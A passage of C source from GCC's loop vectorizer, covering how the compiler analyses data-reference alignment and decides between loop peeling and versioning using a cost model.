dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dr));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
if (supportable_dr_alignment != dr_aligned && dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Vectorizing an unaligned access.\n");
}
return true;
}
/* Given an memory reference EXP return whether its alignment is less
than its size. */
static bool
not_size_aligned (tree exp)
{
if (!tree_fits_uhwi_p (TYPE_SIZE (TREE_TYPE (exp))))
return true;
return (tree_to_uhwi (TYPE_SIZE (TREE_TYPE (exp)))
> get_object_alignment (exp));
}
/* Function vector_alignment_reachable_p
Return true if vector alignment for DR is reachable by peeling
a few loop iterations. Return false otherwise. */
static bool
vector_alignment_reachable_p (struct data_reference *dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
{
/* For interleaved access we peel only if number of iterations in
the prolog loop ({VF - misalignment}), is a multiple of the
number of the interleaved accesses. */
int elem_size, mis_in_elements;
int nelements = TYPE_VECTOR_SUBPARTS (vectype);
/* FORNOW: handle only known alignment. */
if (!known_alignment_for_access_p (dr))
return false;
elem_size = GET_MODE_SIZE (TYPE_MODE (vectype)) / nelements;
mis_in_elements = DR_MISALIGNMENT (dr) / elem_size;
if ((nelements - mis_in_elements) % GROUP_SIZE (stmt_info))
return false;
}
/* If misalignment is known at the compile time then allow peeling
only if natural alignment is reachable through peeling. */
if (known_alignment_for_access_p (dr) && !aligned_access_p (dr))
{
HOST_WIDE_INT elmsize =
int_cst_value (TYPE_SIZE_UNIT (TREE_TYPE (vectype)));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"data size =" HOST_WIDE_INT_PRINT_DEC, elmsize);
dump_printf (MSG_NOTE,
". misalignment = %d.\n", DR_MISALIGNMENT (dr));
}
if (DR_MISALIGNMENT (dr) % elmsize)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"data size does not divide the misalignment.\n");
return false;
}
}
if (!known_alignment_for_access_p (dr))
{
tree type = TREE_TYPE (DR_REF (dr));
bool is_packed = not_size_aligned (DR_REF (dr));
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Unknown misalignment, is_packed = %d\n",is_packed);
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.vector_alignment_reachable (type, is_packed))
return true;
else
return false;
}
return true;
}
/* Calculate the cost of the memory access represented by DR. */
static void
vect_get_data_access_cost (struct data_reference *dr,
unsigned int *inside_cost,
unsigned int *outside_cost,
stmt_vector_for_cost *body_cost_vec)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
int nunits = TYPE_VECTOR_SUBPARTS (STMT_VINFO_VECTYPE (stmt_info));
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
int vf = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
int ncopies = vf / nunits;
if (DR_IS_READ (dr))
vect_get_load_cost (dr, ncopies, true, inside_cost, outside_cost,
NULL, body_cost_vec, false);
else
vect_get_store_cost (dr, ncopies, inside_cost, body_cost_vec);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"vect_get_data_access_cost: inside_cost = %d, "
"outside_cost = %d.\n", *inside_cost, *outside_cost);
}
/* Insert DR into peeling hash table with NPEEL as key. */
static void
vect_peeling_hash_insert (loop_vec_info loop_vinfo, struct data_reference *dr,
int npeel)
{
struct _vect_peel_info elem, *slot;
_vect_peel_info **new_slot;
bool supportable_dr_alignment = vect_supportable_dr_alignment (dr, true);
elem.npeel = npeel;
slot = LOOP_VINFO_PEELING_HTAB (loop_vinfo)->find (&elem);
if (slot)
slot->count++;
else
{
slot = XNEW (struct _vect_peel_info);
slot->npeel = npeel;
slot->dr = dr;
slot->count = 1;
new_slot
= LOOP_VINFO_PEELING_HTAB (loop_vinfo)->find_slot (slot, INSERT);
*new_slot = slot;
}
if (!supportable_dr_alignment
&& unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
slot->count += VECT_MAX_COST;
}
/* Traverse peeling hash table to find peeling option that aligns maximum
number of data accesses. */
int
vect_peeling_hash_get_most_frequent (_vect_peel_info **slot,
_vect_peel_extended_info *max)
{
vect_peel_info elem = *slot;
if (elem->count > max->peel_info.count
|| (elem->count == max->peel_info.count
&& max->peel_info.npeel > elem->npeel))
{
max->peel_info.npeel = elem->npeel;
max->peel_info.count = elem->count;
max->peel_info.dr = elem->dr;
}
return 1;
}
/* Traverse peeling hash table and calculate cost for each peeling option.
Find the one with the lowest cost. */
int
vect_peeling_hash_get_lowest_cost (_vect_peel_info **slot,
_vect_peel_extended_info *min)
{
vect_peel_info elem = *slot;
int save_misalignment, dummy;
unsigned int inside_cost = 0, outside_cost = 0, i;
gimple stmt = DR_STMT (elem->dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
vec<data_reference_p> datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
struct data_reference *dr;
stmt_vector_for_cost prologue_cost_vec, body_cost_vec, epilogue_cost_vec;
int single_iter_cost;
prologue_cost_vec.create (2);
body_cost_vec.create (2);
epilogue_cost_vec.create (2);
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
save_misalignment = DR_MISALIGNMENT (dr);
vect_update_misalignment_for_peel (dr, elem->dr, elem->npeel);
vect_get_data_access_cost (dr, &inside_cost, &outside_cost,
&body_cost_vec);
SET_DR_MISALIGNMENT (dr, save_misalignment);
}
single_iter_cost = vect_get_single_scalar_iteration_cost (loop_vinfo);
outside_cost += vect_get_known_peeling_cost
(loop_vinfo, elem->npeel, &dummy,
/* ??? We use this cost as number of stmts with scalar_stmt cost,
thus divide by that. This introduces rounding errors, thus better
introduce a new cost kind (raw_cost? scalar_iter_cost?). */
single_iter_cost / vect_get_stmt_cost (scalar_stmt),
&prologue_cost_vec, &epilogue_cost_vec);
/* Prologue and epilogue costs are added to the target model later.
These costs depend only on the scalar iteration cost, the
number of peeling iterations finally chosen, and the number of
misaligned statements. So discard the information found here. */
prologue_cost_vec.release ();
epilogue_cost_vec.release ();
if (inside_cost < min->inside_cost
|| (inside_cost == min->inside_cost && outside_cost < min->outside_cost))
{
min->inside_cost = inside_cost;
min->outside_cost = outside_cost;
min->body_cost_vec.release ();
min->body_cost_vec = body_cost_vec;
min->peel_info.dr = elem->dr;
min->peel_info.npeel = elem->npeel;
}
else
body_cost_vec.release ();
return 1;
}
/* Choose best peeling option by traversing peeling hash table and either
choosing an option with the lowest cost (if cost model is enabled) or the
option that aligns as many accesses as possible. */
static struct data_reference *
vect_peeling_hash_choose_best_peeling (loop_vec_info loop_vinfo,
unsigned int *npeel,
stmt_vector_for_cost *body_cost_vec)
{
struct _vect_peel_extended_info res;
res.peel_info.dr = NULL;
res.body_cost_vec = stmt_vector_for_cost ();
if (!unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
{
res.inside_cost = INT_MAX;
res.outside_cost = INT_MAX;
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
->traverse <_vect_peel_extended_info *,
vect_peeling_hash_get_lowest_cost> (&res);
}
else
{
res.peel_info.count = 0;
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
->traverse <_vect_peel_extended_info *,
vect_peeling_hash_get_most_frequent> (&res);
}
*npeel = res.peel_info.npeel;
*body_cost_vec = res.body_cost_vec;
return res.peel_info.dr;
}
/* Function vect_enhance_data_refs_alignment
This pass will use loop versioning and loop peeling in order to enhance
the alignment of data references in the loop.
FOR NOW: we assume that whatever versioning/peeling takes place, only the
original loop is to be vectorized. Any other loops that are created by
the transformations performed in this pass - are not supposed to be
vectorized. This restriction will be relaxed.
This pass will require a cost model to guide it whether to apply peeling
or versioning or a combination of the two. For example, the scheme that
intel uses when given a loop with several memory accesses, is as follows:
choose one memory access ('p') which alignment you want to force by doing
peeling. Then, either (1) generate a loop in which 'p' is aligned and all
other accesses are not necessarily aligned, or (2) use loop versioning to
generate one loop in which all accesses are aligned, and another loop in
which only 'p' is necessarily aligned.
("Automatic Intra-Register Vectorization for the Intel Architecture",
Aart J.C. Bik, Milind Girkar, Paul M. Grey and Ximmin Tian, International
Journal of Parallel Programming, Vol. 30, No. 2, April 2002.)
Devising a cost model is the most critical aspect of this work. It will
guide us on which access to peel for, whether to use loop versioning, how
many versions to create, etc. The cost model will probably consist of
generic considerations as well as target specific considerations (on
powerpc for example, misaligned stores are more painful than misaligned
loads).
Here are the general steps involved in alignment enhancements:
-- original loop, before alignment analysis:
for (i=0; i<N; i++){
x = q[i]; # DR_MISALIGNMENT(q) = unknown
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- After vect_compute_data_refs_alignment:
for (i=0; i<N; i++){
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- Possibility 1: we do loop versioning:
if (p is aligned) {
for (i=0; i<N; i++){ # loop 1A
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = 0
}
}
else {
for (i=0; i<N; i++){ # loop 1B
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = unaligned
}
}
-- Possibility 2: we do loop peeling:
for (i = 0; i < 3; i++){ # (scalar loop, not to be vectorized).
x = q[i];
p[i] = y;
}
for (i = 3; i < N; i++){ # loop 2A
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- Possibility 3: combination of loop peeling and versioning:
for (i = 0; i < 3; i++){ # (scalar loop, not to be vectorized).
x = q[i];
p[i] = y;
}
if (p is aligned) {
for (i = 3; i<N; i++){ # loop 3A
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = 0
}
}
else {
for (i = 3; i<N; i++){ # loop 3B
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = unaligned
}
}
These loops are later passed to loop_transform to be vectorized. The
vectorizer will use the alignment information to guide the transformation
(whether to generate regular loads/stores, or with special handling for
misalignment). */
bool
vect_enhance_data_refs_alignment (loop_vec_info loop_vinfo)
{
vec<data_reference_p> datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
enum dr_alignment_support supportable_dr_alignment;
struct data_reference *dr0 = NULL, *first_store = NULL;
struct data_reference *dr;
unsigned int i, j;
bool do_peeling = false;
bool do_versioning = false;
bool stat;
gimple stmt;
stmt_vec_info stmt_info;
unsigned int npeel = 0;
bool all_misalignments_unknown = true;
unsigned int vf = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
unsigned possible_npeel_number = 1;
tree vectype;
unsigned int nelements, mis, same_align_drs_max = 0;
stmt_vector_for_cost body_cost_vec = stmt_vector_for_cost ();
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_enhance_data_refs_alignment ===\n");
/* While cost model enhancements are expected in the future, the high level
view of the code at this time is as follows:
A) If there is a misaligned access then see if peeling to align
this access can make all data references satisfy
vect_supportable_dr_alignment. If so, update data structures
as needed and return true.
B) If peeling wasn't possible and there is a data reference with an
unknown misalignment that does not satisfy vect_supportable_dr_alignment
then see if loop versioning checks can be used to make all data
references satisfy vect_supportable_dr_alignment. If so, update
data structures as needed and return true.
C) If neither peeling nor versioning were successful then return false if
any data reference does not satisfy vect_supportable_dr_alignment.
D) Return true (all data references satisfy vect_supportable_dr_alignment).
Note, Possibility 3 above (which is peeling and versioning together) is not
being done at this time. */
/* (1) Peeling to force alignment. */
/* (1.1) Decide whether to perform peeling, and how many iterations to peel:
Considerations:
+ How many accesses will become aligned due to the peeling
- How many accesses will become unaligned due to the peeling,
and the cost of misaligned accesses.
- The cost of peeling (the extra runtime checks, the increase
in code size). */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
if (!STMT_VINFO_RELEVANT_P (stmt_info))
continue;
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
/* For invariant accesses there is nothing to enhance. */
if (integer_zerop (DR_STEP (dr)))
continue;
/* Strided loads perform only component accesses, alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, true);
do_peeling = vector_alignment_reachable_p (dr);
if (do_peeling)
{
if (known_alignment_for_access_p (dr))
{
unsigned int npeel_tmp;
bool negative = tree_int_cst_compare (DR_STEP (dr),
size_zero_node) < 0;
/* Save info about DR in the hash table. */
if (!LOOP_VINFO_PEELING_HTAB (loop_vinfo))
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
= new hash_table<peel_info_hasher> (1);
vectype = STMT_VINFO_VECTYPE (stmt_info);
nelements = TYPE_VECTOR_SUBPARTS (vectype);
mis = DR_MISALIGNMENT (dr) / GET_MODE_SIZE (TYPE_MODE (
TREE_TYPE (DR_REF (dr))));
npeel_tmp = (negative
? (mis - nelements) : (nelements - mis))
& (nelements - 1);
/* For multiple types, it is possible that the bigger type access
will have more than one peeling option. E.g., a loop with two
types: one of size (vector size / 4), and the other one of
size (vector size / 8). Vectorization factor will 8. If both
access are misaligned by 3, the first one needs one scalar
iteration to be aligned, and the second one needs 5. But the
the first one will be aligned also by peeling 5 scalar
iterations, and in that case both accesses will be aligned.
Hence, except for the immediate peeling amount, we also want
to try to add full vector size, while we don't exceed
vectorization factor.
We do this automtically for cost model, since we calculate cost
for every peeling option. */
if (unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
possible_npeel_number = vf /nelements;
/* Handle the aligned case. We may decide to align some other
access, making DR unaligned. */
if (DR_MISALIGNMENT (dr) == 0)
{
npeel_tmp = 0;
if (unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
possible_npeel_number++;
}
for (j = 0; j < possible_npeel_number; j++)
{
gcc_assert (npeel_tmp <= vf);
vect_peeling_hash_insert (loop_vinfo, dr, npeel_tmp);
npeel_tmp += nelements;
}
all_misalignments_unknown = false;
/* Data-ref that was chosen for the case that all the
misalignments are unknown is not relevant anymore, since we
have a data-ref with known alignment. */
dr0 = NULL;
}
else
{
/* If we don't know any misalignment values, we prefer
peeling for data-ref that has the maximum number of data-refs
with the same alignment, unless the target prefers to align
stores over load. */
if (all_misalignments_unknown)
{
unsigned same_align_drs
= STMT_VINFO_SAME_ALIGN_REFS (stmt_info).length ();
if (!dr0
|| same_align_drs_max < same_align_drs)
{
same_align_drs_max = same_align_drs;
dr0 = dr;
}
/* For data-refs with the same number of related
accesses prefer the one where the misalign
computation will be invariant in the outermost loop. */
else if (same_align_drs_max == same_align_drs)
{
struct loop *ivloop0, *ivloop;
ivloop0 = outermost_invariant_loop_for_expr
(loop, DR_BASE_ADDRESS (dr0));
ivloop = outermost_invariant_loop_for_expr
(loop, DR_BASE_ADDRESS (dr));
if ((ivloop && !ivloop0)
|| (ivloop && ivloop0
&& flow_loop_nested_p (ivloop, ivloop0)))
dr0 = dr;
}
if (!first_store && DR_IS_WRITE (dr))
first_store = dr;
}
/* If there are both known and unknown misaligned accesses in the
loop, we choose peeling amount according to the known
accesses. */
if (!supportable_dr_alignment)
{
dr0 = dr;
if (!first_store && DR_IS_WRITE (dr))
first_store = dr;
}
}
}
else
{
if (!aligned_access_p (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"vector alignment may not be reachable\n");
break;
}
}
}
/* Check if we can possibly peel the loop. */
if (!vect_can_advance_ivs_p (loop_vinfo)
|| !slpeel_can_duplicate_loop_p (loop, single_exit (loop)))
do_peeling = false;
/* If we don't know how many times the peeling loop will run
assume it will run VF-1 times and disable peeling if the remaining
iters are less than the vectorization factor. */
if (do_peeling
&& all_misalignments_unknown
&& LOOP_VINFO_NITERS_KNOWN_P (loop_vinfo)
&& (LOOP_VINFO_INT_NITERS (loop_vinfo)
< 2 * (unsigned) LOOP_VINFO_VECT_FACTOR (loop_vinfo) - 1))
do_peeling = false;
if (do_peeling
&& all_misalignments_unknown
&& vect_supportable_dr_alignment (dr0, false))
{
/* Check if the target requires to prefer stores over loads, i.e., if
misaligned stores are more expensive than misaligned loads (taking
drs with same alignment into account). */
if (first_store && DR_IS_READ (dr0))
{
unsigned int load_inside_cost = 0, load_outside_cost = 0;
unsigned int store_inside_cost = 0, store_outside_cost = 0;
unsigned int load_inside_penalty = 0, load_outside_penalty = 0;
unsigned int store_inside_penalty = 0, store_outside_penalty = 0;
stmt_vector_for_cost dummy;
dummy.create (2);
vect_get_data_access_cost (dr0, &load_inside_cost, &load_outside_cost,
&dummy);
vect_get_data_access_cost (first_store, &store_inside_cost,
&store_outside_cost, &dummy);
dummy.release ();
/* Calculate the penalty for leaving FIRST_STORE unaligned (by
aligning the load DR0). */
load_inside_penalty = store_inside_cost;
load_outside_penalty = store_outside_cost;
for (i = 0;
STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (
DR_STMT (first_store))).iterate (i, &dr);
i++)
if (DR_IS_READ (dr))
{
load_inside_penalty += load_inside_cost;
load_outside_penalty += load_outside_cost;
}
else
{
load_inside_penalty += store_inside_cost;
load_outside_penalty += store_outside_cost;
}
/* Calculate the penalty for leaving DR0 unaligned (by
aligning the FIRST_STORE). */
store_inside_penalty = load_inside_cost;
store_outside_penalty = load_outside_cost;
for (i = 0;
STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (
DR_STMT (dr0))).iterate (i, &dr);
i++)
if (DR_IS_READ (dr))
{
store_inside_penalty += load_inside_cost;
store_outside_penalty += load_outside_cost;
}
else
{
store_inside_penalty += store_inside_cost;
store_outside_penalty += store_outside_cost;
}
if (load_inside_penalty > store_inside_penalty
|| (load_inside_penalty == store_inside_penalty
&& load_outside_penalty > store_outside_penalty))
dr0 = first_store;
}
/* In case there are only loads with different unknown misalignments, use
peeling only if it may help to align other accesses in the loop. */
if (!first_store
&& !STMT_VINFO_SAME_ALIGN_REFS (
vinfo_for_stmt (DR_STMT (dr0))).length ()
&& vect_supportable_dr_alignment (dr0, false)
!= dr_unaligned_supported)
do_peeling = false;
}
if (do_peeling && !dr0)
{
/* Peeling is possible, but there is no data access that is not supported
unless aligned. So we try to choose the best possible peeling. */
/* We should get here only if there are drs with known misalignment. */
gcc_assert (!all_misalignments_unknown);
/* Choose the best peeling from the hash table. */
dr0 = vect_peeling_hash_choose_best_peeling (loop_vinfo, &npeel,
&body_cost_vec);
if (!dr0 || !npeel)
do_peeling = false;
/* If peeling by npeel will result in a remaining loop not iterating
enough to be vectorized then do not peel. */
if (do_peeling
&& LOOP_VINFO_NITERS_KNOWN_P (loop_vinfo)
&& (LOOP_VINFO_INT_NITERS (loop_vinfo)
< LOOP_VINFO_VECT_FACTOR (loop_vinfo) + npeel))
do_peeling = false;
}
if (do_peeling)
{
stmt = DR_STMT (dr0);
stmt_info = vinfo_for_stmt (stmt);
vectype = STMT_VINFO_VECTYPE (stmt_info);
nelements = TYPE_VECTOR_SUBPARTS (vectype);
if (known_alignment_for_access_p (dr0))
{
bool negative = tree_int_cst_compare (DR_STEP (dr0),
size_zero_node) < 0;
if (!npeel)
{
/* Since it's known at compile time, compute the number of
iterations in the peeled loop (the peeling factor) for use in
updating DR_MISALIGNMENT values. The peeling factor is the
vectorization factor minus the misalignment as an element
count. */
mis = DR_MISALIGNMENT (dr0);
mis /= GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr0))));
npeel = ((negative ? mis - nelements : nelements - mis)
& (nelements - 1));
}
/* For interleaved data access every iteration accesses all the
members of the group, therefore we divide the number of iterations
by the group size. */
stmt_info = vinfo_for_stmt (DR_STMT (dr0));
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
npeel /= GROUP_SIZE (stmt_info);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Try peeling by %d\n", npeel);
}
/* Ensure that all data refs can be vectorized after the peel. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
int save_misalignment;
if (dr == dr0)
continue;
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
/* Strided loads perform only component accesses, alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
save_misalignment = DR_MISALIGNMENT (dr);
vect_update_misalignment_for_peel (dr, dr0, npeel);
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
SET_DR_MISALIGNMENT (dr, save_misalignment);
if (!supportable_dr_alignment)
{
do_peeling = false;
break;
}
}
if (do_peeling && known_alignment_for_access_p (dr0) && npeel == 0)
{
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
if (!stat)
do_peeling = false;
else
{
body_cost_vec.release ();
return stat;
}
}
if (do_peeling)
{
unsigned max_allowed_peel
= PARAM_VALUE (PARAM_VECT_MAX_PEELING_FOR_ALIGNMENT);
if (max_allowed_peel != (unsigned)-1)
{
unsigned max_peel = npeel;
if (max_peel == 0)
{
gimple dr_stmt = DR_STMT (dr0);
stmt_vec_info vinfo = vinfo_for_stmt (dr_stmt);
tree vtype = STMT_VINFO_VECTYPE (vinfo);
max_peel = TYPE_VECTOR_SUBPARTS (vtype) - 1;
}
if (max_peel > max_allowed_peel)
{
do_peeling = false;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Disable peeling, max peels reached: %d\n", max_peel);
}
}
}
if (do_peeling)
{
/* (1.2) Update the DR_MISALIGNMENT of each data reference DR_i.
If the misalignment of DR_i is identical to that of dr0 then set
DR_MISALIGNMENT (DR_i) to zero. If the misalignment of DR_i and
dr0 are known at compile time then increment DR_MISALIGNMENT (DR_i)
by the peeling factor times the element size of DR_i (MOD the
vectorization factor times the size). Otherwise, the
misalignment of DR_i must be set to unknown. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
if (dr != dr0)
vect_update_misalignment_for_peel (dr, dr0, npeel);
LOOP_VINFO_UNALIGNED_DR (loop_vinfo) = dr0;
if (npeel)
LOOP_VINFO_PEELING_FOR_ALIGNMENT (loop_vinfo) = npeel;
else
LOOP_VINFO_PEELING_FOR_ALIGNMENT (loop_vinfo)
= DR_MISALIGNMENT (dr0);
SET_DR_MISALIGNMENT (dr0, 0);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Alignment of access forced using peeling.\n");
dump_printf_loc (MSG_NOTE, vect_location,
"Peeling for alignment will be applied.\n");
}
/* The inside-loop cost will be accounted for in vectorizable_load
and vectorizable_store correctly with adjusted alignments.
Drop the body_cst_vec on the floor here. */
body_cost_vec.release ();
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
gcc_assert (stat);
return stat;
}
}
body_cost_vec.release ();
/* (2) Versioning to force alignment. */
/* Try versioning if:
1) optimize loop for speed
2) there is at least one unsupported misaligned data ref with an unknown
misalignment, and
3) all misaligned data refs with a known misalignment are supported, and
4) the number of runtime alignment checks is within reason. */
do_versioning =
optimize_loop_nest_for_speed_p (loop)
&& (!loop->inner); /* FORNOW */
if (do_versioning)
{
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (aligned_access_p (dr)
|| (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt))
continue;
/* Strided loads perform only component accesses, alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
if (!supportable_dr_alignment)
{
gimple stmt;
int mask;
tree vectype;
if (known_alignment_for_access_p (dr)
|| LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).length ()
>= (unsigned) PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIGNMENT_CHECKS))
{
do_versioning = false;
break;
}
stmt = DR_STMT (dr);
vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
gcc_assert (vectype);
/* The rightmost bits of an aligned address must be zeros.
Construct the mask needed for this test. For example,
GET_MODE_SIZE for the vector mode V4SI is 16 bytes so the
mask must be 15 = 0xf. */
mask = GET_MODE_SIZE (TYPE_MODE (vectype)) - 1;
/* FORNOW: use the same mask to test all potentially unaligned
references in the loop. The vectorizer currently supports
a single vector size, see the reference to
GET_MODE_NUNITS (TYPE_MODE (vectype)) where the
vectorization factor is computed. */
gcc_assert (!LOOP_VINFO_PTR_MASK (loop_vinfo)
|| LOOP_VINFO_PTR_MASK (loop_vinfo) == mask);
LOOP_VINFO_PTR_MASK (loop_vinfo) = mask;
LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).safe_push (
DR_STMT (dr));
}
}
/* Versioning requires at least one misaligned data reference. */
if (!LOOP_REQUIRES_VERSIONING_FOR_ALIGNMENT (loop_vinfo))
do_versioning = false;
else if (!do_versioning)
LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).truncate (0);
}
if (do_versioning)
{
vec<gimple> may_misalign_stmts
= LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo);
gimple stmt;
/* It can now be assumed that the data references in the statements
in LOOP_VINFO_MAY_MISALIGN_STMTS will be aligned in the version
of the loop being vectorized. */
FOR_EACH_VEC_ELT (may_misalign_stmts, i, stmt)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
dr = STMT_VINFO_DATA_REF (stmt_info);
SET_DR_MISALIGNMENT (dr, 0);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Alignment of access forced using versioning.\n");
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Versioning for alignment will be applied.\n");
/* Peeling and versioning can't be done together at this time. */
gcc_assert (! (do_peeling && do_versioning));
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
gcc_assert (stat);
return stat;
}
/* This point is reached if neither peeling nor versioning is being done. */
gcc_assert (! (do_peeling || do_versioning));
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
return stat;
}
/* Function vect_find_same_alignment_drs.
Update group and alignment relations according to the chosen
vectorization factor. */
static void
vect_find_same_alignment_drs (struct data_dependence_relation *ddr,
loop_vec_info loop_vinfo)
{
unsigned int i;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
int vectorization_factor = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
int dra_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dra))));
int drb_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (drb))));
lambda_vector dist_v;
unsigned int loop_depth;
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return;
if (dra == drb)
return;
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
return;
/* Loop-based vectorization and known data dependence. */
if (DDR_NUM_DIST_VECTS (ddr) == 0)
return;
/* Data-dependence analysis reports a distance vector of zero
for data-references that overlap only in the first iteration
but have different sign step (see PR45764).
So as a sanity check require equal DR_STEP. */
if (!operand_equal_p (DR_STEP (dra), DR_STEP (drb), 0))
return;
loop_depth = index_in_loop_nest (loop->num, DDR_LOOP_NEST (ddr));
FOR_EACH_VEC_ELT (DDR_DIST_VECTS (ddr), i, dist_v)
{
int dist = dist_v[loop_depth];
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance = %d.\n", dist);
/* Same loop iteration. */
if (dist == 0
|| (dist % vectorization_factor == 0 && dra_size == drb_size))
{
/* Two references with distance zero have the same alignment. */
STMT_VINFO_SAME_ALIGN_REFS (stmtinfo_a).safe_push (drb);
STMT_VINFO_SAME_ALIGN_REFS (stmtinfo_b).safe_push (dra);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"accesses have the same alignment.\n");
dump_printf (MSG_NOTE,
"dependence distance modulo vf == 0 between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
}
}
}
/* Function vect_analyze_data_refs_alignment
Analyze the alignment of the data-references in the loop.
Return FALSE if a data reference is found that cannot be vectorized. */
bool
vect_analyze_data_refs_alignment (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
